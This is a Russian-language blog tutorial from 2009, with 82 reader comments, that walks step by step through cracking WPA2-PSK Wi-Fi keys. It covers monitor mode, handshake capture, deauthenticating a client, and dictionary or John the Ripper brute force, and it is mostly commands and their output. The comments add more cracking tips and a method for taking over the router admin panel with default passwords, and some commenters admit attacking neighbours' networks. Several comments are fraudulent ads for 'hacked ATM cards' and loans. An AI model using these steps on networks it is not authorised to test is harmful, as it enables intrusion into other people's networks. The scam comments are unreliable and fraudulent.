Linux и Windows: помощь админам и пользователям

Администрируем и настраиваем Windows, Linux.



Взламываем WPA2 PSK используя Backtrack 4, aircrack-ng и John The Ripper

Рубрика: Разное
Метки: | | |
Вторник, 3 марта 2009 г.
Просмотров: 206258
Подписаться на комментарии по RSS

Этапы взлома :

  • Переводим интерфейс в "monitor mode"
  • Находим сети защищенные с помощью WPA2 и Pre Shared Key
  • Захватываем все пакеты
  • Деавторизуем клиента, для захвата начального обмена пакетами.
  • Взламываем ключ используя словари (или с помощью John The Ripper)

 Я использовал карточку Dlink DWL-G122 (USB) во время написания данной статьи. В Backtrack4 данное устройство видно под именем wlan0.

Доставка грузов в Китай контейнерными перевозками является одним из самых надежных и недорогих способов перевозки. Обращайтесь к нам за подробностями.

Для начала переводим карту в режим "monitor mode" :

root@bt:~# airmon-ng 
Interface       Chipset         Driver
wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]
root@bt:~# airmon-ng start wlan0
Interface       Chipset         Driver
wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]
                                (monitor mode enabled on <strong>mon0</strong>)

Сделано, и теперь мы можем использовать карту как mon0

Теперь сканим доступные беспроводные сети, использующие WPA2 / PSK :

root@bt:~# airodump-ng mon0
 CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57                                         
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                    
 00:19:5B:52:AD:F7  -33        5        0    0  10  54   WPA2 CCMP   PSK  TestNet                                                  
 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                            
 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1     12        4  TestNet

Остановите airodump-ng и запустите его заново, записывая все пакеты в файл:

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

В данный момент мы имеем два варианта развития событий: либо дем пока клиент совершит подключение и произойдет процедура авторизации, либо деавторизуем подключенного клиента и тем самым заставим его переподключиться. Время - деньги, поэтому давайте проведем небольшой акт насилия. Нам необходимы bssid точки доступа (-a) и mac адрес подключенного клиента (-c)

root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19  Waiting <span style="color: #0000ff;">for</span> beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

В результате airodump-ng должен показать “WPA Handshake:” в правом верхнем углу:

CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                
 00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54   WPA2 CCMP   PSK  TestNet                                              
 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                           
 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54      0      230

Остановите airodump-ng и убедитесь что все необходимые файлы созданы

root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root   476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root   590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

С этого момента вам не нужно быть где то неподалеку от точки доступа. Весь взлом будет происходить оффлайн, поэтому вы можете остановить airodump и другие процессы. В действительности, вы можете запустить процесс взлома и идти спать, гулять и прочее... Взлом WPA2 PSK базируется на брутфорсе, и может занять длительное время. Существует два пути взлома: первый довольно быстрый, но не гарантирует успеха, а второй довольно медленный, но гарантирует что рано или поздно вы найдете ключ.

Первый метод основывается на списках/словарях. Большое количество данных файлов вы можете найти в интернете (например www.theargon.com), или вы можете сгенерировать его самостоятельно используя утилиты, подобные John The Ripper. Как только словарь создан, вы можете запустить aircrack-ng с данным словарем и файлом .cap, который содержитWPA2 Handshake.

aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
 
Успешность взлома напрямую зависит от сложности пароля. Другими словами, вам может повезти и вы найдете ключ сразу, или не найдете его совсем.
Следующий метод, брутфорс, будет успешным практически наверняка, но может занять очень длительный срок. Необходимо понимать, что ключ WPA2 может содержать до 64-ех символов. Для начала взлома, если вы хотите использовать John The Ripper для создания всех возможных парольных комбинаций, выполните следующую команду.
 
root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

Постовой

Надежные грузоперевозки по России: срочная доставка грузов в Екатеринбург. Разветвленная сеть филиалов.

twitter.com facebook.com vkontakte.ru odnoklassniki.ru mail.ru ya.ru rutvit.ru myspace.com technorati.com digg.com friendfeed.com pikabu.ru blogger.com liveinternet.ru livejournal.ru memori.ru google.com bobrdobr.ru mister-wong.ru yahoo.com yandex.ru del.icio.us

Комментариев: 82

  1. Как насчет использования EWSA от Elcomsoft для брута? Кто-нибудь пробовал его именно для этого случая? Как заимпортировать файлы для брута?

  2. Не могу войти в BackTrack4 логин root вводиться а при попытке вводе пароля клава перестает работать, ни одна кнопка кроме Enter не работает, в итоге через 60 сек. меня выбрасывает заново вводить пароль или при вводе без пароля просто нажатием Enter аналогично выбрасывает и клава снова работает. Такая же ерунда при загрузке диска slitaz-aircrack-ng. Подскаите решение или как обойти эту проблему.

  3. Михаил | 2009-04-30 в 11:46:45

    Спасибо за хорошую информацию! А как в BackTrack4 взламывать WEP ? Спасибо взарание!

    P.S. Я использывал ZD1211rw(usb adapter) ---WPA2 работает!

  4. кто подскажет,как создать словарь для взлома WPA,никак не могу подобрать ключ к точке.

    заранее благодарю ,с уважением # semby # Spain.

  5. вводишь где логин # root Enter

    потом ,в пустой строке, там ничего не будет прописываться,всеравно пишешь #toor Enter

    root@bt:~# startx Enter

  6. Люди, подскажите есть ли пособие по "употреблению" BackTrack или подобных к ему дистрибутивам?

    З.Ы. Очень хочу научиться юзать эту машину, помогите...

  7. Простой вопрос - зачем взламывать точки? Не проще обратиться к психтерапевту?

  8. Нет, не проще. В дискуссию вступать не буду, судя по вопросу это бесполезно.

  9. airodump-ng как его остановить ?????

  10. Аноним | 2009-06-17 в 17:27:01

    Ctrl+Z

  11. Вячеслав | 2009-06-18 в 17:56:14

    Ctrl+C

  12. кто может подсказать там где знак | root@bt:~# /pentest/password/jtr/john --stdout --incremental:all вот здесь | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap надо писать все вместе или раздельно ?

  13. Аноним | 2009-08-04 в 05:57:34

    Alt+Ctrl+Del or Reset

  14. kakoj slovar optimalnuj?

  15. ser#039;ezno | 2009-10-14 в 02:21:15

    этот мануал для 2 вифи карт ?

  16. НАрод вы долбаны и страдаете полной фигней так как взлом впа2 не возможен за исключением брута который будет длится годами, минимальная длина символов пароля для ацес поинта 26 прикинте количетво комбинаций с учетом букв вернего и нижнего регистра и еще цифр,вам лечится нада)))

  17. 1милион пасов в секунду. думаю ето не займет много времени

  18. Лечится надо вам, а ВПА2 взламывается за 15 минут...

    технологии пока незнаю. в сети уже должно было просачится.

  19. to SanSarych Это тебе надо лечится. ВПА2 за 15 минут.... Гониш ты паря. пароль на WEP я открываю за 5 минут максимум, с WPA такое не пройдёт. Может ты скажешь, что и WiMax со своими протоколами - друшлаг?

  20. а фигли тут думать? При 26 символах с учетом верхнего-нижнего регистров и цифр полный перебор по 1 млн. паролей в секунду займет около 9 месяцев. Лучше ёжика родите.

  21. Дмитрий | 2009-11-23 в 23:26:06

    А учитывая то, что есть прошаренные люди, которые с помощью генератора случайных чисел задают нормальные пароли, например во все 63 символа с учетом верхнего и нижнего регистров да еще и с цифрами и вместо TKIP юзают AES... Мне жалко вас ребята...

    Интересно, сколько вы будете например вот такой ключик подбирать: lEqiFRnG9KdXt2i1WpNYCNo56D2FxtUyKciEqz1QU1bqGFD0BB5en0SOveQIDpa

    Лучше потратьте время с пользой. smile

  22. о да. Это не прошареные люди, это любители гомосятины.

  23. vitaliy petrovich | 2009-12-08 в 18:52:41

    У меня такой вопрос, пароль не wpa2 а wpa, при сбрасывании авторизации не происходит хендшейк. Хелп ми ^^ Или для wpa используется другой алгоритм?

  24. Аноним | 2009-12-21 в 13:14:45

    берем видюху с cuda и ,, перебираем пароли со скоростью 350 млн , в секунду

  25. # 2009-12-21 в 13:14:45 | Аноним (анонимно)
    берем видюху с cuda и ,, перебираем пароли со скоростью 350 млн , в секунду

    Ути какой умный... 350 млн. паролей в секунду? А что не миллиард?

    Заходим на опенсорс проект по КУДЕ и видим что с четырьмя 295ми Джифорсами максимум 85 тысяч паролей в секунду...

    т.е. все английские символы одного регистра плюс циферки - 1 год перебора smile

    http://code.google.com/p/pyrit/

  26. Это все конечно хорошо и правильно... с точки зрения теории и генеральной линии КПСС, но прошареных пользователей меньше, чем точек доступа, а длиннючие "случайные" пароли генерит программа, и в действительности это псевдо-случайный пароль. Учитывая же, что задача взлома точки доступа это в 90% поиск любой слабозащищенной точки или проверка своей на гнилость, то метод брутфорса себя оправдывает.

    ЗЫ Есть люди не меняющие даже стандартный пароль по умолчанию, а вы про продвинутость.

    ЗЗЫ Если у когото появится необходимость сломать защиту конкретной точки, то всегда есть и иные средства.

  27. Привет всем! У меня не происходит хендшейк при сбросе авторизации. Сеть Wpa+WPA2 Personal Плиз хелп

  28. Привет всем. У меня тоже нет хендшейка. WPA2. Кто-нибудь сталкивался?

  29. Аноним | 2010-01-22 в 05:09:36

    Net handshake celj ne wpa2 a prostenjkaja WPA ocenj izvenjajusj za shrift smile

    Spisok sovmestimostej wifi kart vrode proshjel.

  30. надо быть полным параноиком или иметь инет по стопицот рублей за мегабайт, чтобы поставить такой пароль smile

  31. Аноним | 2010-02-03 в 06:54:23

    надо сидеть и ждать пока клиент не сделает подключение я оставлял комп на сутки а то и больше в засаде иногда удавалось словить а когда и полный голяк так-что пыхтите это как повезёт почти также как и со словарём слова нет и всё впустую

    08:25:42] 11083904 keys tested (373.46 k/s) Current passphrase: ~schwert~

    Master Key : 05 D2 D2 64 82 BA D8 2D BE E6 64 37 AE 4D 87 8E

    57 05 2D D7 EB A5 7D 3E 11 0E F6 BC F4 E8 30 7C

    Transient Key : 6A 02 95 9B 9A A3 D3 AF E5 FE 47 D6 74 BF 25 C1

    D5 D4 6F 23 35 4A 75 D5 32 1A 31 52 13 B3 C3 55

    E8 2A 5C 5C D8 9C 44 3B 77 96 A1 70 A5 32 66 6F

    E6 1C E6 89 75 5C 45 7B 05 4C 26 61 14 2C 2A 8E

    EAPOL HMAC : 2C 14 DB 2B F4 8F F2 7A FD D0 6E C5 F5 2D BC DF

    Passphrase not in dictionary вот такой мой ответ

  32. Ребят, подскажите, через убунту свою (9.10 Kern....) не могу подцепиться к вайфаю на висте с защитой wap2.... пропадает значек вайфая вообще.. Если на висте создаю соединение без защиты, то спокойно цепляюсь (( В чем трабла кто подскажет?

  33. root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

    как использовать эту команду в debian??? подскажите, пожалуйста

  34. даже если меняю путь, то результата никакого...

  35. Вопрос - фраза "[ WPA handshake: XX:XX:XX:XX:XX:XX" появляется и остаётся до конца сессии airodump-ng, или же её надо специально отлавливать?

    Второй ? - что означают цифры "-0 1" в параметрах aireplay-ng?

  36. Дело все в том, что aircrack-ng находит ключ WPA-PSK только тогда, когда он на 100% верен и совпадает с содержимым cap файла,даже если есть хоть малейшее отличие - ничего!!! не найдет, а перебирать брутом это мазохизм ) слишком долго, и за это время сети просто уже может не быть на месте, или ключ просто поменяют smile))

    так что надо это - Nvidia Tesla хотябы! чтобы иметь хоть какой нибудь шанс http://www.nvidia.ru/page/personal_computing.html На обычном PC смолать можно только очень слабые пароли и то если повезет

  37. И еще - посмотрите ка здесь http://www.onlinepasswordgenerator.net/test-your-password.php сколько требуется чтобы сломать пасс чистым брутфорсом (не по словарю!) smile Удачи!

  38. при вводу команды airmon-ng - пишет Run it as root - чего делать?

  39. AMR, жжешь))

  40. AMR, нужно позвать приятеля по имени Root, он тебе поможет smile)

  41. Подскажите кто-нибудь как правильно в aircrack указать путь к словарю, где его лучше хранить и как называть. К примеру у меня словарь на диске D в папке dictionary под названием

    Russian (Full).dic

  42. Заранее мерси

  43. Aircrack-ng 1.1

    [00:00:00] 24 keys tested (805.32 k/s)

    KEY FOUND! [ 77777777 ]

    Master Key : 75 38 63 D8 61 97 29 E5 66 D5 C0 9F 6F 58 32 FF

    43 C4 48 68 B8 43 D8 B0 45 57 29 A0 53 A9 6F 83

    Transient Key : FD 82 A5 0E B5 CB 69 BA 5F 2C 19 E2 1B D5 C4 DB

    4B 12 DF A8 1D 40 9D C9 33 3D 43 76 E5 2B 4E C7

    5D CF 78 12 DE 63 5F A2 7D C1 EA CB 26 FA 05 C1

    95 F9 0C B3 A5 94 DD 11 74 A9 3C EF 79 A8 98 65

    EAPOL HMAC : DE 80 62 AD AD 9E 79 E7 D9 79 F4 D0 CF 65 02 EC

    Система Ubuntu 10.10

    У кого вылетает беда:

    Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel -1

    и после ругается на -1 порт сделайте следующее:

    sudo wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2010-10-16.tar.bz2

    sudo tar -jxf compat-wireless-2010-10-16.tar.bz2

    sudo cd compat-wireless-2010-10-16

    sudo wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch

    sudo patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch

    sudo wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch

    sudo patch ./net/wireless/chan.c channel-negative-one-maxim.patch

    sudo gedit scripts/update-initramfs

    #*** В строке 13: KLIB=/lib/modules/2.6.31-wl/build

    #*** Изменить на: KLIB=/lib/modules/$(uname -r)/build

    sudo make //после можно и пообедать и покурить и т.п.

    sudo make install //здесь тоже времени на перекур хватит

    sudo make unload

    sudo reboot

    Этим самым патчатся дрова и все у вас будет замечательно...(источник http://ubuntuforums.org/showthread.php?t=1598930)

    еще момент который не указал автор:

    root@bt:~# airodump-ng mon0

    процесс будет длится долго, как только появился STATION запускаем еще один терминал, и уже в нем выполняем:

    aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0

    словарей скачал...где скачал уже забыл:(

    вот словарь по тупым паролям

    00000000

    000000000

    0000000000

    00000000000

    000000000000

    11111111

    111111111

    1111111111

    11111111111

    22222222

    222222222

    2222222222

    22222222222

    33333333

    333333333

    3333333333

    33333333333

    44444444

    444444444

    4444444444

    44444444444

    55555555

    555555555

    5555555555

    55555555555

    66666666

    666666666

    6666666666

    66666666666

    77777777

    777777777

    7777777777

    77777777777

    88888888

    888888888

    8888888888

    88888888888

    99999999

    999999999

    9999999999

    99999999999

    12345678

    123456789

    1234567890

    87654321

    987654321

    0987654321

    11110000

    22220000

    33330000

    55550000

    qwertyui

    qwerty123

    qwerty12345

    gfhjkm12345

    gfhjkm123

    password

    password1

    password123

    password12345

    эт для эксперемтов в случае моего взлома мне его и хватилоsmile

    сохранте это в wap.lst и закинте в папку tmp

    sudo aircrack-ng -w /tmp/wpa.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

    Если вам улыбнулась удача и вы подсоединились, в свойсвах подключения смотрим на свой ип...ип точки доступа будет XX.XX.XX.1 в 99.9%

    Теперь открываем браузер и пишем http://XX.XX.XX.1/ там вы попадете в настройку точки доступа,где вам потребуется ввести логин и пароль, и в 90% случаев логин\пароль заводские, как у делинка так и у асуса это admin admin...далее что позволит фантазия...

  44. +1

    процесс будет длится долго, как только появился STATION запускаем еще один терминал, и уже в нем выполняем:

    aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0

    а насчет патча, так это только для твоего свистка, я для ralink 3071 тоже дрова собирал, blacklist, rmmod, modprobe

  45. когда пишу

    sudo aireplay-ng -0 1 -a (тут bssid точки доступа) -c (тут мак подключенного клиента) mon0

    22:29:35 Waiting for beacon frame (BSSID: 00:**:**:**:**:**) on channel -1

    22:29:35 mon0 is on channel -1, but the AP uses channel 11

    Please specify an ESSID (-e).

    как решить этот трабл? как я только не пытался всегда пишет что канал мон0 не совпадает с каналом АП

  46. 2 Sergey

    твоя карточка должна встать на 11 канал(как и та точка, которую ты ломаешь):

    iwconfig mon0 --channel 11

    P.S. писал по памяти, если что iwconfig --help в помошь)

  47. кстати, если handshake не отображается в airodump-ng во время сбора пакетов, это еще не значит, что его не было и он не захвачен.

    лучше всего во время работы airodump-ng откройте wireshark и поставте фильтр по протоколу "eapol": как только появляются такие пакеты значит handshake захвачен.

  48. После ввода:

    airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
    ,

    что нужно нажать?, чтобы ввести "акт насилия":

    root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
  49. Возможно ли взламать wpa2-psk з помощю CommView for WiFi и aircrak ng

  50. To serg:

    Нащел как путь правильный показывать?

    Всем:

    куда надо закинуть словарь и как показывать его путь?

    Спасибо

  51. у меня на нет буке интегрированой карточки невидит((((

  52. при вводу команды airmon-ng - пишет Run it as root - чего делать?

    Помогите ЧАЙНИКУ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

  53. Четланин | 2011-10-21 в 17:58:45

    Вуаерист долбаный!!!!!!!!!!!!!Оставь людей в покое!!!!!!!!!!!!

  54. Аноним | 2011-10-27 в 14:56:23

    шо?

  55. Конь яблочный | 2011-10-28 в 00:47:19

    Вручную собирать хендшейки геморно!

    Проще взять besside-ng и оставить на пару часов.

    В результате появятся три файлика:

    besside.log - там essid и bssid пойманных хендшейков

    wep.cap и wpa.cap - сами хендшейки соответственно для WEP и WPA сетей

    Ну и потом, да, скормить это всё в aircrack-ng.

    А ещё лучше с элементами мутации в виде privet, ghbdrn, privet2011, ghbdtn2011 и т.д.

    Вообщем, составление словаря - процесс творческий и тольк от него зависит успешность подбора пароля.

    А время потраченное на подобор зависит от производительности компа.

    И вот тут можно не парить себе мозг а воспользоваться онлайн сервисом каким-нибудь, благо в инете такое добро есть и зачастую песплатно. Я пользуюсь двумя сайтами обычно:

    http://wpa.darkircop.org/ - эффективность 9% - бесплатно

    http://gpuhash.com/ - эффективность 20% - один словарь бесплатно и производительность 300 тысяч паролей в секунду.

    Мне на домашнем компе удавалось максимум 2 тыс.паролей в секунду перебирать, а у меня надо сказать не такой уж слабый комп.

    Если кто найдёт достойный сервис онлайн для перебора - кидайте в комменты, всем пригодится.

    Удачи! ;)

  56. GouldCORRINE26 | 2011-12-25 в 10:35:53

    I had got a desire to begin my firm, but I did not have enough of money to do this. Thank heaven my colleague recommended to utilize the home loans. So I received the bank loan and made real my desire.

  57. Простите за глупый вопрос, но... Перебор длинной в несколько недель это конечно здорово. А если подойти к вопросу творчески, например настроить свой маршрутизатор на тот же канал, поставить тот же ESSID, выдав свою сеть за ломаемую. Если хозяин вафли слишком любопытен, но он наверняка поломится на дублирующую сеть со своим ключем. Дело за малым- нужно каким то образом заставить муршрутизатор запомнить вводимый в него ключик. Возможно ли это?

  58. А если хозяин вафли не слишком любопытен, то можно простимулировать его любопытство aireplay-ем

  59. Тут есть всё для того чтобы подобрать пароль к WIFI

    http://wpa2.at.ua/forum/4-1-9#302

  60. Дрзья подскажите ка экспортировать словарь в aircrack-ng

  61. kto moshit mne date dlia thomson WPA-PSK WORDLIST

  62. бля , а где можно скачать нормальные словари..??? подскажите пожалуйста..!!!

  63. и в правду подскажите друзья где можно скачать нормальные словари больше интересует цифровые ну там например мобильные телефоны итд

  64. http://bruteforce.3dn.ru/news/slovari_dlja_bruteforce/1-0-12 — здесь выложил более 15 различных словарей, на разных языках, разного вида, рзличных видов.

  65. Хочу отправить пакеты деаутентификации через ту же прогу

    aireplay-ng -0 5 -a "мак точки" -c "мак клиента подключенного" mon0 но выходит сообщение

    Waiting for beacon frame (здесь мак точки) on channel -1

    mon0 is on channel -1, but the AP uses channel 10

    или такое

    Waiting for beacon frame (здесь мак точки) on channel -1

    No such BSSID available.

    Please specify an ESSID (-e).

  66. SamanthaJefferson | 2012-12-30 в 00:56:25

    Do you recognize that it's high time to get the loans, which can make your dreams come true.

  67. НормальноеИмя | 2013-02-05 в 23:34:11

    http://guruadmin.ru/page/vzlamyvaem-wpa2-psk-ispolzuja-backtrack-4-aircrack-ng-i-john-the-ripper#comment-128

    Он просто не виден, вводи пасс и жмии ентер ты просто не видишь пасс ;)

  68. после ввода

    aireplay-ng -0 1 -a (тут bssid точки доступа) -c (тут мак подключенного клиента) mon0

    пишет

    Couldn't determine current channel for wlan1, you should either force the operation with --ignore-negative-one or apply a kernel patch

    Please specify an ESSID (-e).

  69. Аноним | 2013-08-22 в 00:07:11

    Master Key : 07 86 E4 86 7F 3A 25 3B 69 1B 28 69 09 35 21 7B

    0E 9F C6 C7 3F D9 79 12 0D AF D7 80 13 8D 1D A2

    Transient Key : 70 9B 02 47 E1 9E 5B 4E 47 28 19 0C 58 F9 79 DC

    D5 01 F6 3E B0 EC A5 EB D1 E4 C4 CF 16 DF 57 A0

    1F 30 52 CD 08 2A 8A 28 4D 4E 3A C5 3F 81 02 AF

    A2 34 A0 C3 D7 E4 28 34 A7 C7 64 7F D2 C4 27 C4

    EAPOL HMAC : 37 CF 9B 97 10 BD 09 36 C6 39 63 A8 AE F9 AC D4

    какой пароль

  70. Приветствую вас,

    Г-н Духов выдавая кредиты.

    Вы должны были Банку в связи с плохой кредит, или вы были обмануты, или, что более вероятно,

    нужна бизнес-кредит, немедленно вернуться к заявлению о

    Вашей финансовой свободы и счастья, чтобы обеспечить вашу информацию ниже.

    Полные имена:

    Страна:

    Мобильный телефон:

    Необходимое количество:

    Продолжительность:

    Ежемесячный доход:

    Пол:

    Род занятий:

    Пишите нам: larrymarkloanfirm@hotmail.com

    Только серьезные запросы.

    Whit кредитора.

  71. Помогите пожалуйста с поролем. плисссс....

    Master Key : 8F 3D F8 DB 3C A1 A4 30 9B 9D F9 67 59 4D 02 FA

    46 FB 74 BD 46 F4 B2 C9 A6 CA 4A 3F 2F 20 DA CE

    Transient Key : 17 E6 4D 09 69 B0 51 65 6A 09 85 AB DE 89 F2 CA

    F5 90 3B 74 A5 FD 0A 48 38 32 05 A0 F8 5A 46 2F

    9F E2 02 38 FB 84 18 94 13 EA 43 2C A0 BC 6A B6

    84 71 B4 E7 91 B6 09 C4 7C F3 2F 3E C1 8F 64 1F

    EAPOL HMAC : CD 30 62 0F EC 3A 29 80 E6 D0 B0 76 D8 20 A1 90

    СКИНТЕ НА МЫЛО ПОЖАЛУЙСТА uvladislava@pisem.net или сюда....

    Заранее _-_ блогодарю!

  72. немогу зарегистрировать эту программу, какой код активации??

  73. привет всем.кто может подсказать,при использовании aicrack нахожу пороль от wpa2,но когда хочу войти в данную сеть через найденный пароль подключиться не могу.пароль типа неверный.что делать? может это программка в реале ничего не находит?

  74. Андрей | 2014-09-20 в 17:42:28

    Не работает эта команда root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

    ни в Backtrack4 ни в Backtrack5

    говорит нет такого каталога

  75. Андрей | 2014-09-20 в 17:45:08

    Взлом из словаря, подбирает пароли которые не работают, в одном и том же словаре выбирает каждый раз разные значения, при повторном запуске.)

  76. Есть программа с автогенерацией словаря, очень гибкая настройка подбора, получилось на работе ею хакнуть вафлю - myfinet ru

  77. Просто хочу поделиться немного моей

    свидетельство, как я также получил взломанный банкомат

    Карта, которая может вывести USD 10,000 каждый

    день в любой банкомат загрузки все вокруг

    мир. эта карта является реальной и законным

    он работает так прекрасно для меня. это

    E-mail компании, которые производят

    карта: Вы можете добраться до них на один

    этой карты, и ваша жизнь изменится

    почта для связи

    mrbrownhacker@hotmail.com

  78. Всем привет. Существует новый способ изготовления наличные деньги, хотя это незаконно, но и умный и простой способ жизни большой. Я использовал, чтобы быть барак мальчик, пока я не стал готов, и решил изменить свою жизнь, так или друга. Я получил подходящее, чтобы зарегистрироваться для воинствующего амнистии через соединение, таким образом, взяв меня из страны для обучения в Соединенных Штатах в течение 2года. Чтобы вырезать Короче говоря, во время моего обучения я имел в виду несколько белых друзей, которые были выродки, а также эксперты в ATM ремонт, программирования и исполнения, которые учили меня различные советы и хитрости о нарушении в банкомате. с моей знания, полученные от моих белых друзей выродка, я был в состоянии подделать и программы карта пустой банкомат с помощью различных инструментов и программного обеспечения. У меня есть готовые запрограммированы карты ATM, или если вы хотите узнать, вы также можете связаться со мной. Это не афера. Я просто 24 и у меня есть деньги, у меня есть автомобиль, я живу в Африке и я путешествую по всему миру. я сделать мои вещи на низкий ключ, чтобы избежать подозрений. Некоторые из вас будут удивлены, почему я это продажа, если действительно я уже живет большая. Это потому, что это трудная задача сделать это самостоятельно, я не буду лгать тебе, это не легко взломать банкомат говорить больше, чтобы перепрограммировать карту в одиночку. Это займет дней, а иногда и недель. Некоторые из вас захотят готовый карту, чтобы избежать стресса делать это самостоятельно, и я не дают готовый карту из бесплатно, потому что я провел дней, пытаясь сделать его доступным для вас. напишите мне. mrbrownhacker@hotmail.com для получения дополнительной информации, объяснения и запросов. ПРИМЕЧАНИЕ: карта банкомата имеет некоторые ПИН, № зарегистрированный номер счета. Это не имеет предела для вывода и это безвестно. Вы можете собирать деньги с любого счета, просто набрав лица номер счета. так, свяжитесь со мной мою электронную почту: mrbrownhacker@hotmail.com

  79. Сергей | 2015-07-08 в 00:24:50

    Подскажите! Поймали WPA HandShake и решили проверить на своем wifi, в словарь воткнули нужный пароль но при поиске нароль найден небыл! в чем может быть проблема?!

  80. Сергей | 2015-07-08 в 00:26:52

    точнее не на своем вайфае а на соседском, ну мы пароль знаем их!

  81. Стать богатым сегодня, и взять на себя риск превращения своего собственного life.Try и получить пустую карту банкомат сегодня из (MR Wandy) и быть в числе тех счастливчиков, которые получают выгоду от этой карты. Это ЗАПРОГРАММИРОВАННОЕ пустая карта ATM способна взломе любой банкомат, в любой точке мира. Я должен знать об этой пустой карты ATM, когда я искал работу в Интернете около месяца ago..It действительно изменил мою жизнь навсегда, и теперь я могу сказать, что я богат, потому что я живым свидетельством. Наименее деньги я получаю в день с этой карты составляет около $ 3,000.Every сейчас и потом я держать закачивать деньги на мой счет. Хотя это незаконно, не существует никакого риска быть пойманным, так как она была запрограммирована таким образом, что она не отслеживаться, а также имеет технику, что делает невозможным для видеонаблюдения, чтобы обнаружить you..For подробную информацию о том, как получить ваш сегодня, по электронной почте хакеров на: wandyhackersworld88@gmail.com

  82. Доброго времени суток. Проводил дома аудит безопасности соседских беспроводных сетей,

    Стибрил хендшейк: *hz_network-0.cap**.

    Делаю, значит:

    aircrack-ng -w rc.txt hs/hz_network-0*.cap

    Через пару минут . оно мне:

    Passphrase not in dictionary 0

    При том что словарь ~100Mib а комп не слабый.. Другие словари(почти все, как большего, так и меньшего объема работают)

    Думал че не так с кодировкой: сделал?Может проблема в словаре ?кто нибудь поможет.я по инструкции создавал словарь любое но постоянно такое при взломе.

Оставьте комментарий!

Используйте нормальные имена.

Имя и сайт используются только при регистрации

Если вы уже зарегистрированы как комментатор или хотите зарегистрироваться, укажите пароль и свой действующий email. При регистрации на указанный адрес придет письмо с кодом активации и ссылкой на ваш персональный аккаунт, где вы сможете изменить свои данные, включая адрес сайта, ник, описание, контакты и т.д., а также подписку на новые комментарии.

(обязательно)